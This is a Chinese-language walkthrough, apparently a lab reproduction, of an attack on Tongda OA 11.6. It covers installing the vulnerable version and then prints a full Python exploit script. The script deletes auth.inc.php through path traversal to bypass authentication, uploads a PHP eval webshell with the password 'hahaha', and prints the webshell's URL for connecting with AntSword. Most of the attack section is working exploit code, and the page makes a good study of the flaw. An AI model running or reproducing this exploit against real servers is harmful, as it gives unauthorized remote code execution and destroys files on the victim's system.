环境搭建安装OA访问网站使用exp脚本蚁剑拿shell

环境搭建

现在通达官网已经把版本升级到了11.7，所以下载11.6版本需要去第三方下载平台

安装OA

傻瓜式安装，配置界面如下。完成安装之后就可以暂时不用管它了

访问网站

界面如下：

使用exp脚本

脚本内容如下，核心思路就是删除网站里的一个名为auth.inc.php的文件，进而越权拿shell

import requests#填写iptarget="http://ip/" #一句话木马的密码是hahaha payload="<?php eval($_POST['hahaha']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")#删除网站里的一个名为auth.inc.php的文件url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php" requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[-]Failed to deleted auth.inc.php")exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('deconf.php', payload)}requests.post(url=url,files=files)url=target+"/_deconf.php"page=requests.get(url=url).textif 'No input file specified.' not in page:print("[+]Filed Uploaded Successfully")print("[+]URL:",url)else:print("[-]Failed to upload file")

程序执行之后出现了一个URL，那个URL就是一句话木马所在位置

蚁剑拿shell